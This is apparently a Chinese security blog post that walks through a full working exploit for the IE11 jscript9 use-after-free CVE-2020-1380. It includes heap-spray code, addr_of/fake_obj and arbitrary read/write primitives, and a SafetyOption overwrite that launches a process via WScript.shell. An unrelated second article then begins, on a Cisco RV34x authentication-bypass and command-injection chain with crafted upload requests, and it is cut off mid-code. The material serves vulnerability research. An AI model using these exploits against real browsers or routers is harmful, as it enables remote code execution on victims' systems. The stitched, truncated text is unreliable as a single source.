ie CVE-2020-1380是2020年抓到的一个在野利用的0 day，且此漏洞目前在野外利用不少。

ie的版本是11.103.10586.0，在https://msdn.itellyou.cn/上下的系统是Windows 10 (Multiple Editions), Version 1511 (Updated Feb 2016) (x86) - DVD (English) ，对应的windows版本为Version 1511(OS Build 10586.104)，该系统安装后的版本即为此次分析的ie浏览器版本，漏洞分析是在x86系统上进行的。

基础知识--custom heap 堆

在ie 9之后的jscript9引擎中，为了阻止OOB漏洞的利用，ie把一些重点对象单独拿出来放到一个堆中来进行管理，而不是直使用进程堆。因此在jscript9中，堆数据可以分为两部分：

• 一部分是进程堆（Process Heap、CRT Heap）。
• 一部分是自定义堆（Custom Heap），普通的Array对象、typed array（view）对象、string对象都是分配在custom Heap里的。

一个有意思的点是var fa = new Float32Array(8)的代码，typed array对象的数据结构会保存在custom heap当中，然而它的fa.buffer(ArrayBuffer)的数据却是从进程堆中申请出来的。下面是JavascriptArrayBuffer::Create的反汇编代码，可以看到ArrayBuffer的堆分配函数是CRT函数malloc。

struct Js::JavascriptArrayBuffer *__fastcall Js::JavascriptArrayBuffer::Create(
        unsigned int a1,
        struct Js::DynamicType *a2)
{
  ...
  Js::ArrayBuffer::ArrayBuffer(v5, a1, a2, _malloc);
  *(_DWORD *)v5 = &Js::JavascriptArrayBuffer::`vftable';
  return v5;
}

还需要知道一点的是当在自定义堆中申请大的对象时，自定义堆的数据管理结构是LargeHeapBlock，该对象构成了ie自定义堆的基础，存储有自定义堆上分配的大型堆空间的管理信息。LargeHeapBlock对象存储在进程堆中的。

LargeHeapBlock的数据结构如下所示，偏移量0x4处的指针指向IE自定义堆中的数据，对于通过创建多个大的Array对象来触发LargeHeapBlock对象分配的情况，该指针直接指向了此时分配的一个Array对象。0x14指向的是Allocated Block Count，即当前已经分配的Block，如果该字段被置为0，则该对象所指向的自定义堆会在垃圾回收的过程中被释放。

漏洞分析

CVE-2020-1380是IE11上jscript9引擎的一个UAF漏洞，其成因是Array.prototype.push的副作用导致JIT引擎数据类型推导错误。

趋势科技给出的poc代码如下：

var ab = new ArrayBuffer(0x8c);
var fa = new Float32Array(ab);
 
var obj = {};
obj.valueOf = function() {
    worker = new Worker('worker.js');
    worker.postMessage(ab, [ab]);
    worker.terminate();
    worker = null;
 
    var start = Date.now();
    while (Date.now() - start < 200) {}
 
    return 0
};
 
function opt(a, b, c, d) {
    a = 1;
    arguments.push = Array.prototype.push;
    arguments.length = 0;
    arguments.push(d);
 
    if (c) {
        a = 2;
    }
 
    b[0] = a;
};
 
for (var i = 0; i < 0x100000; i++) {
    opt(1, fa, 1, 1);
}
 
opt(1, fa, 0, obj);

先开启页堆hpa，poc跑一遍，看看出啥问题。

"C:\Program Files\Windows Kits\10\Debuggers\x86\gflags.exe" -i iexplore.exe +hpa

崩溃现场如下。ftsp是将浮点寄存器st0中的值存储到对应内存中的意思，崩溃现场即是将0.0存储到地址11d81f70 中。

This exception may be expected and handled.
eax=11d81f70 ebx=1197d480 ecx=00000000 edx=00000116 esi=0de3bad0 edi=1ff61e00
eip=5d046083 esp=07cbc844 ebp=07cbc844 iopl=0         nv up ei pl zr na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010247
jscript9!Js::JavascriptConversion::ToFloat_Helper+0x13:
5d046083 d918            fstp    dword ptr [eax]      ds:0023:11d81f70=????????
0:008> r st0
st0= 0.00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000e+0000 (0:0000:0000000000000000)

崩溃的成因是opt函数经过优化编译过后，b[0]=a所对应的代码会认为a一直都是浮点数，不会有side effect，因此直接调用ToFloat_Helper将a转化成浮点数并赋值给b[0]。但是实际上在前面的代码中arguments.push会改变对象arguments[0]（即对象a的类型），导致在b[0]=a赋值的时候可以触发回调函数。但是此时代码中缺少了对a的类型的检查，导致漏洞的形成。

在poc中，触发漏洞时对象a的回调函数是调用postMessage将ArrayBuffer传递给worker，postMessage将数据传递给worker的同时，本线程就会失去对当前ArrayBuffer的所属，该ArrayBuffer就会被释放，但是后续在opt函数中b[0]=a，仍然将对象a返回值的0.0赋值给b[0]，导致形成UAF漏洞。此处也是因为我们开启了页堆，所以将0.0当写入到已释放的内存ArrayBuffer 0x11d81f70的时候就报错了。

漏洞分析部分本应还包含代码层面的分析的，但是苦于对js9架构机制不太熟，所以只能从原理层面对漏洞成因进行分析，后续有能力再从代码层面进一步分析。

漏洞利用

上面的漏洞我们得到了一个UAF漏洞，即在回调函数中我们释放掉了ArrayBuffer数据内存，同时后续在优化编译函数中仍然可以对该内存进行读写操作。

首先要搞清楚的是我们使用什么来占用被释放掉的ArrayBuffer数据内存。在前面的基础知识中已经阐述过，ArrayBuffer数据内存是由进程堆分配的，LargeHeapBlock数据结构也是由进程堆分配的，因此如果我们利用漏洞释放掉ArrayBuffer数据内存后，再利用LargeHeapBlock占用该内存，后续再对ArrayBuffer数据进行读写的时候，实质上就是对LargeHeapBlock数据结构进行读写。

这里要搞清楚的是LargeHeapBlock数据结构大小是多少，很多文章都说该数据结构大小是根据申请的内存大小动态变化的，当申请new Array((0x1000 - 0x20) / 4)即0x1000大小的Array的时候，LargeHeapBlock对应为new ArrayBuffer(0x8c)所对应的内存，具体可以动态调试下断点来进一步确认，断点如所示：

bp jscript9!LargeHeapBucket::AddLargeHeapBlock+0x92

所对应的代码如下所示，LargeHeapBlock::New的返回值即是LargeHeapBlock堆块。

struct LargeHeapBlock *__thiscall LargeHeapBucket::AddLargeHeapBlock(LargeHeapBucket *this, unsigned int a2)
{
   ...
    lpAddress = PageAllocator::Alloc((PageAllocator *)(v4 + 8), &v13, &v12);
    if ( lpAddress )
    {
      v6 = LargeHeapBlock::New(
             (char *)v12,
             (((v13 << 12) - a2 - 16) >> 10) + 1,
             *((_BYTE *)this + 28) != 0 ? this : 0,
             v9,
             v10);

此时问题就变成了对LargeHeapBlock数据结构进行读写，对何处进行读写能够继续进一步的利用。答案是覆盖LargeHeapBlock中0x14偏移的Allocated Block Count字段，将它覆盖为0，这样后续如果触发垃圾回收机制，该LargeHeapBlock结构所管理的堆内存会被认为是被释放的，后面就会被继续申请与利用，从而就可以形成重叠堆快。

上述思路所形成的代码如下所示。opt函数中b[5] = a时会触发obj的valueOf函数，该函数首先会释放ab，sleep一段时间等待堆内存被释放，然后堆喷LargeHeapBlock结构去申请大内存重新占有该ab内存，因为valueOf函数会返回0，最终会执行b[5] = 0，此时ab已经被覆盖为LargeHeapBlock结构，因此会将LargeHeapBlock结构的Allocated Block Count修改为0。

var ARRAY_LENGTH = 0x500
var b = new Array(ARRAY_LENGTH);
var c = new Array(ARRAY_LENGTH); 
var obj = {};
obj.valueOf = function() {
    // free the Float32Array ArrayBuffer
    worker = new Worker('worker.js');
    worker.postMessage(ab, [ab]);
    worker.terminate();
    worker = null;
 
    // sleep to wait system free the ArrayBuffer
    var start = Date.now();
    while (Date.now() - start < 300) {}
    
    // spray LargeHeapBlock structure to occupy the freed ArrayBuffer
    for (var i = 0; i < ARRAY_LENGTH; ++i) {
        b[i] = new Array((0x1000 - 0x20) / 4);
        for (var j = 0; j < b[i].length; ++j)
            b[i][j] = 0x666;
    }
 
    return 0;
};
function opt(a, b, c, d) {
    a = 1;
    arguments.push = Array.prototype.push;
    arguments.length = 0;
    arguments.push(d);
 
    if (c) {
        a = 2;
    }
 
    // now the Float32Array ArrayBuffer is the same as LargeHeapBlock structure, overwrite b[5] will change the LargeHeapBlock's Allocated Block Count to 0
    b[5] = a;
};

后续调用CollectGarbage手动触发垃圾回收，此时会认为被修改的LargeHeapBlock结构所对应数组b中的某个数组内存是被释放了的。此时再申请大内存，系统会再次分配该内存，此时数组b和数组c就有某个数组就会形成重叠堆块，遍历两个数组，找到重叠的对象内存。

// gc to manual free the LargeHeapBlock memory.
CollectGarbage();
var index1 = -1;
var index2 = -1;
// spray malloc LargeHeapBlock heap again, it will occupy the same memory with b array
for (var i = 0; i < ARRAY_LENGTH; ++i) {
    c[i] = new Array((0x1000 - 0x20) / 4);
    for (var j = 0; j < c[i].length; ++j)
        c[i][j] = 0x888;
}
// find the overlap heap in array b
for (var i = 0; i < b.length; i += 1) {
    if (b[i][0] == 0x888) {
        index1 = i;
        b[i][0] = 0x666;
        break;
    }
}
 
// find the overlap heap in array c
for (var i = 0; i < c.length; i += 1) {
    if (c[i][0] == 0x666) {
        index2 = i;
        break;
    }
}

找到重叠的对象后，将其中某个数组修改为对象数组，这样就形成整数数组与对象数组指向同一片内存，很简单的就得到了addr_of以及fake_obj原语：

// transition the array type 
c[index2][0] = {};
// now we can get addr_of and fake_obj primitive
var int_arr = b[index1];
var obj_arr = c[index2];
 
function addr_of(obj) {
    obj_arr[0] = obj;
    return int_arr[0];
}
function fake_obj(addr) {
    int_arr[0] = addr;
    return obj_arr[0];
}

有了addr_of以及fake_obj原语，接着就是构造aar以及aaw原语，原语的构造方法是伪造DataView结构体，通过修改DataView的内存指针来实现任意地址读写，详细过程可以参考Edge Type Confusion利用：从type confused到内存读写。

DataView对应的32位结构体如下所示，其中偏移为0x1c的是我们要填写任意地址读写的字段。

DataView:
+0x0  : vtable;
+0x4  : TypeObject;
+0x8  : 0;
+0xc  : 0;
+0x10 : JavascriptArrayBuffer;
+0x14 : 0;
+0x18 : size;
+0x1c : Buffer;

还需要关注的三个字段是vtable、TypeObject以及JavascriptArrayBuffer字段。

当我们利用伪造的fake_dv进行任意地址读写的时候，它会调用vtable中的虚函数，由于我们不知道虚函数表的地址，因此需要方法来绕过。方法是不直接用fake_dv.getUint32这样的形式来进行调用，而是用DataView.prototype.getUint32.call(fake_dv, 0, true)的形式来调用，这样就不需要从fake_dv对象的vtable字段来获取函数地址。

第二个要关注的字段是TypeObject指针，它里面的typeId要合理有效，JavascriptLibrary地址要为有效的内存地址。

TypeObject:
+0x0  : typeId;
+0x4  : JavascriptLibrary;
+0x8  : prototype;
+0xc  : Js::RecyclableObject::DefaultEntryPoint;
+0x10 : 0;
+0x14 : 0;
+0x18 : SimplePathTypeHandler;
+0x1c : value;

第三个要关注的字段是JavascriptArrayBuffer，它所指向的内存地址某位是用来标记是否是isDetached。如果被置位，说明内存已被释放不能再使用，所以要将该字段置0。

最终构造fake_dv代码如下。

// fake DataView struct container
var container = new Array(
    0,     // field 0: fake vtable
    0,      // field 1: TypeObject pointer
    0,      // field 2: Inherited data from Dynamic Object
    0,      // field 3: Inherited data from Dynamic Object
    0,      // field 4: buffer size
    0,      // field 5: ArrayBuffer Object pointer
    0,      // field 6: byteoffset
    0       // field 7: target addr
)
var container_addr = addr_of(container);
var fake_dv_addr = container_addr + 0x38;
container[0] = 46                   // fake vtable, also used as TypeId in TypeObject Pointer
container[1] = fake_dv_addr;        // fake TypeObject Pointer point to fake_dv_addr, also as fake TypeObject JavascriptLibrary pointer
container[2] = 0;                   // the isDetached bit should be 0
container[4] = fake_dv_addr + 8;    // fake ArrayBuffer Object pointer, the isDetached bit should be 0
container[6] = 0x300;               // fake size
container[7] = fake_dv_addr;        // arbitrary pointer
// build fake DataView, now we can aar and aaw with this fake_dv
var fake_dv = fake_obj(fake_dv_addr);

有了fake_dv以后，aar以及aaw就很简单了，修改DataView的Buffer字段即可。

// aar primitive
function read32(addr) {
    container[7] = addr;
    var val = DataView.prototype.getUint32.call(fake_dv, 0, true);
    return val;
}
function read8(addr) {
    container[7] = addr;
    var val = DataView.prototype.getUint8.call(fake_dv, 0, true);
    return val;
}
function read16(addr) {
    container[7] = addr;
    var val = DataView.prototype.getUint16.call(fake_dv, 0, true);
    return val;
}
// aaw primitive
function write8(addr, val) {
    container[7] = addr;
    DataView.prototype.setUint8.call(fake_dv, 0, val, true);
}
function write32(addr, val) {
    container[7] = addr;
    DataView.prototype.setUint32.call(fake_dv, 0, val, true);
}
function write_string(addr, s) {
    var bytes = [];
    var i = 0;
    for ( ; i < s.length; ++ i ) {
        bytes[i] = s.charCodeAt(i);
    }
    bytes[i] = 0;
    write_bytes( addr, bytes );
}
function write_bytes(addr, bytes) {
    for ( var i = 0; i + 3 < bytes.length; i += 4 ) {
        var value = (bytes[i] & 0xff) | ((bytes[i+1] & 0xff) << 8) |
                    ((bytes[i + 2] & 0xff) << 16) | ((bytes[i + 3] & 0xff) << 24);
                            
        write32( addr + i, value );
    }
            
    for ( ; i < bytes.length; ++ i ) {
        write8( addr + i, bytes[i] );
    }
}

有了任意地址读写原语，最后就是任意代码执行，根据[原创]IE JScript9.dll UAF漏洞(CVE-2020-1380)利用复现笔记，目前ie从aar以及aaw到任意代码执行主要有三种方式：

1. GodMode：利用任意地址读写原语修改内存中的GodMode字段，即可使用ActiveX调用任意代码与程序。
2. 虚表劫持：劫持Js::JavascriptOperators::HasItem函数内的一处虚表调用为WinExec来调用任意代码。
3. 覆盖栈上返回地址：覆盖Js::JavascriptString::EntrySplit和Js::JavascriptString::EntrySlice函数的返回地址以劫持程序执行流。

我这里只用了第一种方式，因此解释下第一种方式的利用原理，其余两种后续漏洞分析有机会再分析。

在ie中，决定不安全的ActiveX控件能否在没有提示的情况下运行仅仅依赖于单个标志，即ScriptEngine对象中的SafetyOption标志，如果通过任意地址读写将此标志置为0，那么就能开启实例化和运行不安全ActiveX控件的能力。详细原理可以查看Exploit IE Using Scriptable ActiveX Controls.pdf

在Internet Explorer 11中微软通过引入一个0x20字节的hash来保护SafetyOption标志不被覆盖，以此缓解该技术的利用。但是通过查看Windows 10当前jscript9.dll版本中的ScriptEngine::CanCreateObject以及ScriptEngine::CanObjectRun函数发现负责保护hash的ScriptEngine::GetSafetyOptions函数已经不见了，因此SafetyOption标志将不再受到保护，写入单个空字节就能实现利用的技术又可行了。

最终执行calc的代码如下所示：

// leak address
// get dataview vtable
var dv_vtable_addr = read32(addr_of(dv))
// get jscript9 module base
var jscript9_base_addr = get_module_base(dv_vtable_addr);
alert("[+] jscript9 base addr: "+hex(jscript9_base_addr));
// get kernel32 module base
var kernel32_base_addr = get_module_base_from_IAT(jscript9_base_addr, "KERNEL32");
alert("[+] kernel32 base addr: "+hex(kernel32_base_addr));
// get winexec addr
// var winexec_addr = get_proc_address( kernel32_base_addr, 'WinExec' );
// alert("[+] winexec func addr: "+hex(winexec_addr));
function run_shellcode() {
    var shell = new ActiveXObject("WScript.shell");
    shell.Exec("calc.exe");
    // shell.Exec("notepad.exe");
}
// change the safe_mode flag
var leak_activex_addr = addr_of(ActiveXObject);
var script_engine = read32(read32(leak_activex_addr + 0x1c) + 0x04);
var safe_mode = script_engine + 0x1F4; 
// turn on god mode
write32(safe_mode, 0);
run_shellcode();

弹出计算器。

当然，权限是AppContainer，后面还要过沙箱。

总结

这个漏洞是2020年抓到的一个在野利用的0 day，通过分析它进一步掌握了ie漏洞的利用方法，同时这个漏洞目前在野外利用还是不少。

64位系统中的利用大同小异，结构体指针字段加长罢了。

References

[1] 趋势科技: https://www.trendmicro.com/en_us/research/20/h/cve-2020-1380-analysis-of-recently-fixed-ie-zero-day.html
[2] Edge Type Confusion利用：从type confused到内存读写: https://www.anquanke.com/post/id/98774
[3] [原创]IE JScript9.dll UAF漏洞(CVE-2020-1380)利用复现笔记: https://bbs.pediy.com/thread-263885.htm
[4] Exploit IE Using Scriptable ActiveX Controls.pdf: https://github.com/jvazquez-r7/explib2/blob/modify/Exploit%20IE%20Using%20Scriptable%20ActiveX%20Controls.pdf
[5] CVE-2020-1380: Analysis of Recently Fixed IE Zero-Day: https://www.trendmicro.com/en_us/research/20/h/cve-2020-1380-analysis-of-recently-fixed-ie-zero-day.html
[6] Internet Explorer and Windows zero-day exploits used in Operation PowerFall: https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/
[7] CVE-2020-1380: Internet Explorer JScript9 Use-after-Free: https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2020/CVE-2020-1380.html
[8] [原创]IE JScript9.dll UAF漏洞(CVE-2020-1380)利用复现笔记: https://bbs.pediy.com/thread-263885.htm
[9] IE浏览器0day漏洞CVE-2020-1380的分析、利用和检测: https://www.freebuf.com/vuls/283182.html
[10] Edge Type Confusion利用：从type confused到内存读写: https://www.anquanke.com/post/id/98774
[11] Exploit IE Using Scriptable ActiveX Controls.pdf: https://github.com/jvazquez-r7/explib2/blob/modify/Exploit%20IE%20Using%20Scriptable%20ActiveX%20Controls.pdf

阅读原文

跳转微信打开

在经历了多次修补之后，在Pwn2Own Austin 2021上Cisco RV34x系列路由器仍然被IoT Inspector Research Lab攻破

Affected vendor & product
Vendor Advisory
Cisco RV340 Dual WAN Gigabit VPN Router (https://www.cisco.com/)
https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-smb-mult-vuln-KA9PK6D.html
Vulnerable version    1.0.03.24 and earlier
Fixed version    1.0.03.26
CVE IDs    CVE-2022-20705
CVE-2022-20708
CVE-2022-20709
CVE-2022-20711
Impact    10 (critical) AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Credit    Q. Kaiser, IoT Inspector Research Lab

# /etc/nginx/nginx.conf
user www-data;
worker_processes  4;
error_log /dev/null;
events {
    worker_connections  1024;
}
http {
    access_log off;
    #error_log /var/log/nginx/error.log  error;
    upstream jsonrpc {
        server 127.0.0.1:9000;
    }
    upstream rest {
        server 127.0.0.1:8008;
    }
    # For websocket proxy server
    include /var/nginx/conf.d/proxy.websocket.conf;
    include /var/nginx/sites-enabled/*;
}

/usr/bin # ls /var/nginx/sites-enabled/
web-rest-lan  web-wan

# /etc/nginx/sites-available/web-rest-lan
...
server {
    server_name  localhost:443;
    #mapping to Firewall->Basic Settings->LAN/VPN Web Management, it will generate by ucicfg
    ...
    include /var/nginx/conf.d/lan.rest.conf;
    ...
    include /var/nginx/conf.d/web.upload.conf;
    ...
}

# /etc/nginx/conf.d/rest.url.conf: 13
location /api/operations/ciscosb-file:form-file-upload {
    set $deny 1;
    if ($http_authorization != "") {
        set $deny "0";
    }
    if ($deny = "1") {
        return 403;
    }
    upload_pass /form-file-upload;
    upload_store /tmp/upload;
    upload_store_access user:rw group:rw all:rw;
    upload_set_form_field $upload_field_name.name "$upload_file_name";
    upload_set_form_field $upload_field_name.content_type "$upload_content_type";
    upload_set_form_field $upload_field_name.path "$upload_tmp_path";
    upload_aggregate_form_field "$upload_field_name.md5" "$upload_file_md5";
    upload_aggregate_form_field "$upload_field_name.size" "$upload_file_size";
    upload_pass_form_field "^.*$";
    upload_cleanup 400 404 499 500-505;
    upload_resumable on;
}

# etc/nginx/conf.d/proxy.conf，
proxy_http_version 1.1;
proxy_set_header Host $http_host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
proxy_set_header Authorization $http_authorization;
proxy_set_header Accept-Encoding "";
proxy_set_header Connection "";
proxy_ssl_session_reuse off;
server_name_in_redirect off;

POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1
Host: 192.168.1.1
Authorization: 123=456
Cookie: selected_language=English; session_timeout=false; sessionid=2727f44696347c5e1218c78a2471f1c48ab9e6f4a9c3b3b6ab1db9a1365fd620; user=cisco; blinking=1; config-modified=1; disable-startup=0; redirect-admin=0; group=admin; attributes=RW; ru=0; bootfail=0; model_info=RV345; fwver=1.0.03.24; current-page=Admin_Config_Management
Content-Length: 854
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
Accept: application/json, text/plain, */*
Optional-Header: header-value
Sec-Ch-Ua-Mobile: ?0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBtdH1UtBT6GPZrcM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://192.168.1.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.1/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryBtdH1UtBT6GPZrcM
Content-Disposition: form-data; name="sessionid"
2727f44696347c5e1218c78a
------WebKitFormBoundaryBtdH1UtBT6GPZrcM
Content-Disposition: form-data; name="pathparam"
a
------WebKitFormBoundaryBtdH1UtBT6GPZrcM
Content-Disposition: form-data; name="file.path"
a
------WebKitFormBoundaryBtdH1UtBT6GPZrcM
Content-Disposition: form-data; name="fileparam"
a
------WebKitFormBoundaryBtdH1UtBT6GPZrcM
Content-Disposition: form-data; name="websession"; filename="a.xml"
Content-Type: text/xml
{
  "max-count":1,
  "cisco":{
    "4a04cd411434cea78f2d81b692dfa4a41aea9e4b15536fb933fab11df8ed414a":{
      "user":"cisco",
      "group":"admin",
      "time":315156,
      "access":1,
      "timeout":9999,
      "leasetime":15275860
    }
  }
}
------WebKitFormBoundaryBtdH1UtBT6GPZrcM--

# /etc/nginx/conf.d/web.upload.conf
location /form-file-upload {
    include uwsgi_params;
    proxy_buffering off;
    uwsgi_modifier1 9;
    uwsgi_pass 127.0.0.1:9003;
    uwsgi_read_timeout 3600;
    uwsgi_send_timeout 3600;
}
location /upload {
    set $deny 1;
        if (-f /tmp/websession/token/$cookie_sessionid) {
                set $deny "0";
        }
        if ($deny = "1") {
                return 403;
        }
    upload_pass /form-file-upload;
    upload_store /tmp/upload;
    upload_store_access user:rw group:rw all:rw;
    upload_set_form_field $upload_field_name.name "$upload_file_name";
    upload_set_form_field $upload_field_name.content_type "$upload_content_type";
    upload_set_form_field $upload_field_name.path "$upload_tmp_path";
    upload_aggregate_form_field "$upload_field_name.md5" "$upload_file_md5";
    upload_aggregate_form_field "$upload_field_name.size" "$upload_file_size";
    upload_pass_form_field "^.*$";
    upload_cleanup 400 404 499 500-505;
    upload_resumable on;
}

# usr/bin/uwsgi-launcher: 5
#!/bin/sh /etc/rc.common
start() {
    uwsgi -m --ini /etc/uwsgi/jsonrpc.ini &
    uwsgi -m --ini /etc/uwsgi/blockpage.ini &
    uwsgi -m --ini /etc/uwsgi/upload.ini &
}

# /etc/uswgi/upload.ini
[uwsgi]
plugins = cgi
workers = 1
master = 1
uid = www-data
gid = www-data
socket=127.0.0.1:9003
buffer-size=4096
cgi = /www/cgi-bin/upload.cgi
cgi-allowed-ext = .cgi
cgi-allowed-ext = .pl
cgi-timeout = 300
ignore-sigpipe = true

int __fastcall main(int a1, char **a2, char **a3)
{
  ...
  content_length_ptr = (int)getenv("CONTENT_LENGTH");
  content_type_ptr = getenv("CONTENT_TYPE");
  request_uri_ptr = getenv("REQUEST_URI");
  http_cookie_ptr = getenv("HTTP_COOKIE");
  ...
  callbacks.on_header_value = read_header_name;
  callbacks.on_part_data = read_header_value;
  json_obj = json_object_new_object();
  ...
  parser = multipart_parser_init(boundary_ptr, &callbacks);
  length = strlen(content_buf_ptr);
  multipart_parser_execute(parser, content_buf_ptr, length);
  multipart_parser_free(parser);
  jsonutil_get_string(json_obj, &filepath_ptr, "\"file.path\"", -1);
  jsonutil_get_string(json_obj, &filename_ptr, "\"filename\"", -1);
  jsonutil_get_string(json_obj, &pathparam_ptr, "\"pathparam\"", -1);
  jsonutil_get_string(json_obj, &fileparam_ptr, "\"fileparam\"", -1);
  jsonutil_get_string(json_obj, &destination_ptr, "\"destination\"", -1);
  jsonutil_get_string(json_obj, &option_ptr, "\"option\"", -1);
  jsonutil_get_string(json_obj, &cert_name_ptr, "\"cert_name\"", -1);
  jsonutil_get_string(json_obj, &cert_type_ptr, "\"cert_type\"", -1);
  jsonutil_get_string(json_obj, &password_ptr, "\"password\"", -1);
  ...
  local_fileparam_ptr = StrBufToStr(local_fileparam_buf);
  ret_code = prepare_file(pathparam_ptr, filepath_ptr, local_fileparam_ptr);

int __fastcall prepare_file(const char *type, const char *src, const char *dst)
{
  ...
  if ( !strcmp(type, "Firmware") )
  {
    target_dir = "/tmp/firmware";
  }
  ...
  else
  {
    if ( strcmp(type, "Portal") )
      return -1;
    target_dir = "/tmp/www";
  }
  if ( !is_file_exist(src) )
    return -2;
  if ( strlen(src) > 0x80 || strlen(dst) > 0x80 )
    return -3;
  if ( match_regex("^[a-zA-Z0-9_.-]*$", dst) )
    return -4;
  sprintf(s, "mv -f %s %s/%s", src, target_dir, dst);
  debug("cmd=%s", s);
  ...
  ret_code = system(s);

POST /form-file-upload HTTP/1.1
Host: 192.168.1.1
Cookie: selected_language=English; session_timeout=false; sessionid=2727f44696347c5e1218c78a2471f1c48ab9e6f4a9c3b3b6ab1db9a1365fd620; user=cisco; blinking=1; config-modified=1; disable-startup=0; redirect-admin=0; group=admin; attributes=RW; ru=0; bootfail=0; model_info=RV345; fwver=1.0.03.24; current-page=Admin_Config_Management
Content-Length: 626
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
Accept: application/json, text/plain, */*
Optional-Header: header-value
Sec-Ch-Ua-Mobile: ?0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBtdH1UtBT6GPZrcM
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Origin: https://192.168.1.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://192.168.1.1/index.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
------WebKitFormBoundaryBtdH1UtBT6GPZrcM
Content-Disposition: form-data; name="sessionid"
2727f44696347c5e1218c78a
------WebKitFormBoundaryBtdH1UtBT6GPZrcM
Content-Disposition: form-data; name="pathparam"
Portal
------WebKitFormBoundaryBtdH1UtBT6GPZrcM
Content-Disposition: form-data; name="file.path"
/tmp/upload/0000000001
------WebKitFormBoundaryBtdH1UtBT6GPZrcM
Content-Disposition: form-data; name="fileparam"
bak
------WebKitFormBoundaryBtdH1UtBT6GPZrcM
Content-Disposition: form-data; name="websession"; filename="a.xml"
Content-Type: text/xml
{
}
------WebKitFormBoundaryBtdH1UtBT6GPZrcM--

#!/usr/bin/perl
my $total = $#ARGV + 1;
my $counter = 1;
#$mac  = "FF:FF:FF:FF:FF:FF";
#$name = "TestPC";
#$type = "Computer";
#$os   = "Windows";
foreach my $a(@ARGV)
{
    if (($counter%12) == 0)
    {
        system("lcstat dev set $mac \"$name\" \"$type\" \"$os\" > /dev/null");
    }
    elsif (($counter%12) == 4)
    {
        $mac = $a
    }
    elsif (($counter%12) == 6)
    {
        $name = $a
    }
    elsif (($counter%12) == 8)
    {
        $type = $a
    }
    elsif (($counter%12) == 10)
    {
        $os = $a
    }
    $counter++;
}

    // /etc/confd/yang/ciscosb-avc.yang: 197
        rpc update-clients {
        input {
            list clients {
                key mac;
                leaf mac {
                    type yang:mac-address;
                    mandatory true;
                }
                leaf hostname {
                    type string;
                }
                leaf device-type {
                    type string;
                }
                leaf os-type {
                    type string;
                }
            }
        }
    }
    augment "/ciscosb-ipgroup:ip-groups/ciscosb-ipgroup:ip-group/ciscosb-ipgroup:ips" {
        uses ciscosb-security-common:DEVICE-OS-TYPE;
    }
    augment "/ciscosb-ipgroup:ip-groups/ciscosb-ipgroup:ip-group/ciscosb-ipgroup:macs" {
        uses ciscosb-security-common:DEVICE-OS-TYPE;
    }

POST /jsonrpc HTTP/1.1
Host: 127.0.0.1:8080
Accept: application/json, text/plain, */*
Content-Length: 350
Connection: close
Cookie: selected_language=English; user=cisco; blinking=1; config-modified=1; disable-startup=0; redirect-admin=0; group=admin; attributes=RW; ru=0; bootfail=0; model_info=RV345; fwver=1.0.03.24; session_timeout=false; sessionid=138b633ddd844b81a8ea48a149819f645fbe31fb64a1bd7cc0072f3d14420da0; current-page=WAN_Settings
{
  "jsonrpc":"2.0",
  "method":"action",
  "params":{
    "rpc":"update-clients",
    "input":{
      "clients": [
        {
          "hostname": "rv34x",
          "mac": "64:d1:a3:4f:be:e1",
          "device-type": "client",
          "os-type": "windows"
        }
      ]
    }
  }
}

# /etc/nginx/conf.d/web.conf: 18
location = /jsonrpc {
    include uwsgi_params;
    proxy_buffering off;
    uwsgi_modifier1 9;
    uwsgi_pass jsonrpc;
    uwsgi_read_timeout 3600;
    uwsgi_send_timeout 3600;
}

[uwsgi]
plugins = cgi
workers = 4
master = 1
uid = www-data
gid = www-data
socket=127.0.0.1:9000
buffer-size=4096
cgi = /jsonrpc=/www/cgi-bin/jsonrpc.cgi
cgi-allowed-ext = .cgi
cgi-allowed-ext = .pl
cgi-timeout = 3600
ignore-sigpipe = true

int __fastcall main(int a1, char **a2, char **a3)
{
  content_length_ptr = (int)getenv("CONTENT_LENGTH");
  content_type_ptr = getenv("CONTENT_TYPE");
  http_cookie_ptr = getenv("HTTP_COOKIE");
  ...
  if ( content_length_ptr )
    content_length_ptr = atoi((const char *)content_length_ptr);
  content_ptr = malloc(content_length_ptr + 1);
  content_ptr[fread(content_ptr, 1u, content_length_ptr, stdin)] = 0;
  malloc_ctx(&json_ctx);
  parse_json_content(json_ctx, content_ptr);
  ...
    handle_rpc(json_ctx, &ret_str);
  }

void __fastcall handle_rpc(ctx *json_ctx, char **ret_str)
{
  ...
  debug("[%d|%s] - begin.", pid, method);
  ...
    ret = post_rpc_request(json_ctx, (char *)&ptr);
    ...
    info("[%d|%s] - end. elapsed=%lu.%06lu", pid, method, time.tv_sec, time.tv_usec);
  }
}

int __fastcall post_rpc_request(ctx *json_ctx, char *ret_str)
{
  char *method; // r4
  int ret; // r0 MAPDST
  method = json_ctx->method;
  if ( !method )
    return 0;
  if ( !strcmp(json_ctx->method, "login")
    || !strcmp(method, "logout")
